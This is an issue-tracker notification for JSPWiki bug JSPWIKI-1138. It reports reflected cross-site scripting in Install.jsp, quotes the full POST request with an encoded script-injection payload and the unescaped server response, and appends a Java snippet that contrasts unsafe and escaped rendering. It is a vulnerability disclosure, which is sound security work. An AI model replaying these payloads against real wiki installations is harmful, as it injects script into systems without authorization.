[ https://issues.apache.org/jira/browse/JSPWIKI-1138?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
ASF GitHub Bot updated JSPWIKI-1138:
------------------------------------
    Labels: pull-request-available  (was: )

> Install.jsp UI overhaul
> -----------------------
>
>                 Key: JSPWIKI-1138
>                 URL: https://issues.apache.org/jira/browse/JSPWIKI-1138
>             Project: JSPWiki
>          Issue Type: Task
>          Components: Core & storage
>    Affects Versions: 2.11.0-M8
>         Environment: Windows new version
> Firefox version 84.0.1
>            Reporter: Nguyen Dang Khai
>            Priority: Major
>              Labels: pull-request-available
>         Attachments: xsswiki.PNG
>
>
> In the function *install.jsp* there exist multiple XSS in the parameters *jspwiki.applicationName, jspwiki.fileSystemProvider.pageDir, jspwiki.workDir*. The parameters are not sanitized via the method *getContentEncoding*().
>
> * Request :
> {code:java}
> // POST /wiki_jsp_war/Install.jsp HTTP/1.1
> Host: localhost:8080
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 248
> Origin: http://localhost:8080
> Connection: close
> Referer: http://localhost:8080/wiki_jsp_war/Install.jsp
> Cookie: JSESSIONID=079AB09DC4350BB216A468B15DC9F8BA; XDEBUG_SESSION=XDEBUG_ECLIPSE
> Upgrade-Insecure-Requests: 1
>
> jspwiki.applicationName=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.fileSystemProvider.pageDir=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&jspwiki.workDir=F%3A%5C%5CExtension%5C%5Capache-tomcat-8.5.60%5C%5Ctemp&submit=Configure%21
> {code}
>
> * Response:
> {code:java}
> // HTTP/1.1 200
> Pragma: no-cache
> Expires: -1
> Cache-Control: no-cache
> Content-Type: text/html;charset=UTF-8
> Content-Language: en-US
> Date: Wed, 23 Dec 2020 10:33:46 GMT
> Connection: close
> Content-Length: 4403
>
> <?xml version="1.0" encoding="UTF-8"?>
> ...
> </div><div class="formcontainer"><form action="Install.jsp" method="post">
> <!-- Page directory -->
> <h3>Basics</h3>
> <label class="control-label" >Application Name<input class="form-control" type="text" name="jspwiki.applicationName" size="20" value="'"><script>alert(1)</script>"/>
> </label>
> <div class="help-block">
> What should your wiki be called? Try to use a relative short name.</div>
> <label class="control-label" >Page storage<input class="form-control" type="text" name="jspwiki.fileSystemProvider.pageDir" size="40" value="'"><script>alert(1)</script>"/>
> </label>
> <div class="help-block">
> By default, JSPWiki will use the VersioningFileProvider that stores files in a directory. If you specify a directory that does not exist, JSPWiki will try to create it for you. All attachments will also be put in the same directory.</div>
> <h3>Security</h3>
> <label class="control-label" >Administrator account</label>
> <p>Enabled</p>
> <div class="description">
> This wiki has an administrator account named <strong>admin</strong> that is part of the wiki group <strong>Admin</strong>. By default, JSPWiki's security policy grants all members of the Admin group the all-powerful <code>AllPermission</code>.</div>
> <h3>Advanced Settings</h3>
> <label class="control-label" >Work directory<input class="form-control" type="text" name="jspwiki.workDir" size="40" value="F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp"/>
> </label>
> <div class="help-block">
> This is the place where all caches and other runtime stuff is stored.</div>
> <p class="help-block">
> After you click <em>Configure!</em>, the installer will write your settings to <code>F:\Extension\apache-tomcat-8.5.60\temp\jspwiki-custom.properties</code>. It will also create an Administrator account with a random password and a corresponding Admin group.</p>
> <input class="btn btn-primary" type="submit" name="submit" value="Configure!" /></form></div><hr />
> <h3>Here is your new jspwiki-custom.properties</h3>
> <pre>jspwiki.applicationName = '"><script>alert(1)</script>
> jspwiki.fileSystemProvider.pageDir = '"><script>alert(1)</script>
> jspwiki.workDir = F:\\\\Extension\\\\apache-tomcat-8.5.60\\\\temp
> jspwiki.basicAttachmentProvider.storageDir = '"><script>alert(1)</script>
> jspwiki.pageProvider = VersioningFileProvider
> </pre>
> <!-- We're done... -->
> </div>
> </div>
> </div>
> </body>
> </html>
> {code}

--
This message was sent by Atlassian Jira
(v8.20.10#820010)
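As an added illustration of the finding in the quoted report (this is not JSPWiki's own code; the class and method names are hypothetical), the following Java snippet contrasts the verbatim concatenation visible in the response above with a rendering that HTML-escapes every echoed installer value, covering both the `<input value="...">` attribute context and the `<pre>` properties preview:

```java
import java.util.LinkedHashMap;
import java.util.Map;

// Hypothetical helper, not JSPWiki code: escapes installer form values before they are echoed.
public class InstallerEscapeDemo {

    // Escape for an HTML attribute value or text node. '&' must be replaced first so that
    // entities produced by the later replacements are not themselves re-escaped.
    static String escapeHtml(String s) {
        if (s == null) return "";
        return s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                .replace("\"", "&quot;").replace("'", "&#39;");
    }

    // Vulnerable rendering, as in the reported response: the submitted value is concatenated
    // verbatim, so a value starting with '"> closes the attribute and the tag.
    static String renderInputUnsafe(String name, String value) {
        return "<input class=\"form-control\" type=\"text\" name=\"" + name
                + "\" value=\"" + value + "\"/>";
    }

    // Hardened rendering: every attribute value goes through escapeHtml, so the quote and
    // angle brackets arrive in the browser as &quot; &lt; &gt; and stay inside the attribute.
    static String renderInputSafe(String name, String value) {
        return "<input class=\"form-control\" type=\"text\" name=\"" + escapeHtml(name)
                + "\" value=\"" + escapeHtml(value) + "\"/>";
    }

    // Hardened version of the "Here is your new jspwiki-custom.properties" <pre> preview,
    // which is a text-node context and needs the same escaping.
    static String renderPropertiesSafe(Map<String, String> props) {
        StringBuilder sb = new StringBuilder("<pre>");
        for (Map.Entry<String, String> e : props.entrySet()) {
            sb.append(escapeHtml(e.getKey())).append(" = ")
              .append(escapeHtml(e.getValue())).append('\n');
        }
        return sb.append("</pre>").toString();
    }

    public static void main(String[] args) {
        // The jspwiki.applicationName value from the report's request, URL-decoded.
        String submitted = "'\"><script>alert(1)</script>";
        System.out.println(renderInputUnsafe("jspwiki.applicationName", submitted));
        System.out.println(renderInputSafe("jspwiki.applicationName", submitted));
        Map<String, String> props = new LinkedHashMap<>();
        props.put("jspwiki.applicationName", submitted);
        props.put("jspwiki.pageProvider", "VersioningFileProvider");
        System.out.println(renderPropertiesSafe(props));
    }
}
```

Output escaping only protects the HTML page; the same values are still written to jspwiki-custom.properties by the installer, so that file is a separate sink to validate independently.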